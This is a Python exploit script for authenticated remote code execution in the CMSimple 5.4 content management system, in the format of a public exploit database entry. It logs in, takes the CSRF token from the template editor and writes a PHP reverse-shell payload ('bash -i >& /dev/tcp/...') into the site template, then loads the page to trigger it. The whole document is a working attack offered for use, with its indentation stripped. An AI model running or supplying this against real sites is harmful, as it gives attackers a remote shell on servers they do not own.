# Exploit Title: Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)
# Date: 29.09.2021
# Exploit Author: pussycat0x
# Vendor Homepage: https://www.cmsimple.org/
# Version: 5.4
# Tested on: ubuntu-20.04.1
import argparse
from bs4 import BeautifulSoup
from argparse import ArgumentParser
import requests
parser= ArgumentParser(description="cmsimple ", epilog='cmsimpleRCE.py -url targetdomai.com -u username -p password -ip lhost -lp lport')
rparser = parser.add_argument_group('required argument')
rparser.add_argument('-url','--host', type=str, help='target domain',required=True)
rparser.add_argument('-u' ,'--username', type=str, help='', required=True)
rparser.add_argument('-p','--password',type=str,help='', required=True)
rparser.add_argument('-ip','--lhost',type=str,help='listener ip', required=True)
rparser.add_argument('-lp','--lport', type=str,help='listener port', required=True)
args= parser.parse_args()
#url ='192.168.1.106'
s = requests.Session()
def main():
try:
url =(args.host)
payload = {
'user':args.username,
'passwd':args.password,
'submit': 'Login',
'login':'true',
}
login=s.post(url +'/?Welcome_to_CMSimple_5',data=payload)
if login.status_code == 200:
print('Exploit Completed')
else:
print("Invalid Credential")
cook =(login.cookies.get_dict())
temp = s.get(url +'/?file=template&action=edit', cookies=cook)
soup = BeautifulSoup(temp.text, 'lxml')
csrfToken = soup.find('input',attrs = {'name':'csrf_token'})['value']
#<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
rev = """<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"""
rev2=(args.lhost)
rev3=(args.lport)
rev4=""" 0>&1'");"""
php =(rev+rev2+'/'+rev3+rev4)
revpayload = {
'cmsimpleDataFileStored':'cmsimpleDataFileStored',
'csrf_token':csrfToken,
'text':php,
'file':'template',
'action':'save',
}
shell = s.post(url +'/',cookies=cook , data=revpayload)
exec = s.get(url+'/')
exit()
except:
pass
main()